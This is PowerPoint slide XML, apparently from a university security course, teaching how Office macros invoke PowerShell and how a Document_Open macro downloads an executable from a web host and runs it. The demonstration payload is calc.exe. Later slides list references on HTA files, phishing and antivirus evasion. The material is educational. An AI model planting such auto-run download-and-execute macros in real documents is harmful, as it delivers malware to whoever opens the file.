          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> a = Shell("C:\Windows\System32\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>WindowsPowerShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\v1.0\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>powershell.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>NoExit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -command " + "write-host 'Hello'")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>End Sub</a:t>
            </a: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14</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Invoke </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> inside Macro</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="321643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2675467"/>
            <a:ext cx="8856983" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Private Sub </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Document_Open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> a = Shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(“C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:\Windows\System32\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>WindowsPowerShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\v1.0\powershell.exe -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>NoExit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(New-Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>System.Net.WebClient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>DownloadFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(‘https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>staff.csie.ncu.edu.tw/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>hsufh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/COURSES/SPRING2022/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>calc.exe’,‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:\Users\Fu-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Hau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>H\Desktop\test1.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>’)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Start-Process </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:\Users\Fu-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Hau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>H\Desktop\test1.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>’)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>End Sub</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008000"/>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7FF8C78C-8FDE-4FCF-9D21-7AA0D5AA827C}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Use a Macro to Download and Execute a Remote File</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2756295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16</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271851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gn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4000" dirty="0" smtClean="0"/>
              <a:t>HTA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4000" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4000" i="1" u="sng" baseline="-25000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Alex </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4000" i="1" u="sng" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Hedley</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4000" i="1" baseline="-25000" dirty="0"/>
              <a:t>] [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4000" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Đỗ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4000" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t> Anh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4000" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Tú</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4000" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="4000" i="1" baseline="-25000"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17</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641568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8020413" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Hacking around HTA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>files</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" cap="all" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>EMERIC NASI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>HTML Applications - Introducing the HTA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>File</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>HyperWrite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t> Pty Ltd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" baseline="-25000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>HTA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>文件繞過殺軟及郵件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>釣魚</a:t>
            </a:r>
